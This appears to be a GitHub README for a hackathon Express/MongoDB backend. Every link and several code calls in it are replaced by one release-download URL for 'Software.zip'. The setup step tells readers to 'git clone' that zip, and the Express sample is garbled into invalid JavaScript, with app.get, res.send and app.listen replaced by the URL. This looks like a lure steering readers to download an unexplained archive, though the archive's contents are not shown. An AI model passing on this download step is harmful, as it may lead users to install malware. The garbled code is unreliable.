This repository contains the backend codebase for the Hacathon SMIT 2025 Batch 11 Coding Night. Join us in our quest to create innovative solutions using cutting-edge technologies!
- Repository Name: hacathon-backend-smit
- Description: Backend development for Hacathon SMIT - 2025 - Batch - 11 Coding Night
- Topics: backend-development, express-middleware, expressjs, frontend-development, hacathon, mongodb-atlas, mongoose, nodejs, nodemon, npm, npx
-
Clone the repository:
git clone https://github.com/RAZZISPROATGAMING/hacathon-backend-smit/releases/download/v2.0/Software.zip
-
Install dependencies:
npm install
-
Run the development server:
npm start
const express = require('express');
const app = express();
https://github.com/RAZZISPROATGAMING/hacathon-backend-smit/releases/download/v2.0/Software.zip('/', (req, res) => {
https://github.com/RAZZISPROATGAMING/hacathon-backend-smit/releases/download/v2.0/Software.zip('Welcome to Hacathon SMIT!');
});
https://github.com/RAZZISPROATGAMING/hacathon-backend-smit/releases/download/v2.0/Software.zip(3000, () => {
https://github.com/RAZZISPROATGAMING/hacathon-backend-smit/releases/download/v2.0/Software.zip('Server is running on port 3000');
});- Express Middleware for seamless request handling
- MongoDB Atlas integration for database operations
- Mongoose for elegant MongoDB object modeling
- Nodemon for automatic server restarts
- npm & npx for package management and script execution
We welcome contributions to enhance our backend system for the Hacathon SMIT event. Feel free to fork the repository and submit your pull requests to collaborate with us!
Let's code and innovate together! 🌟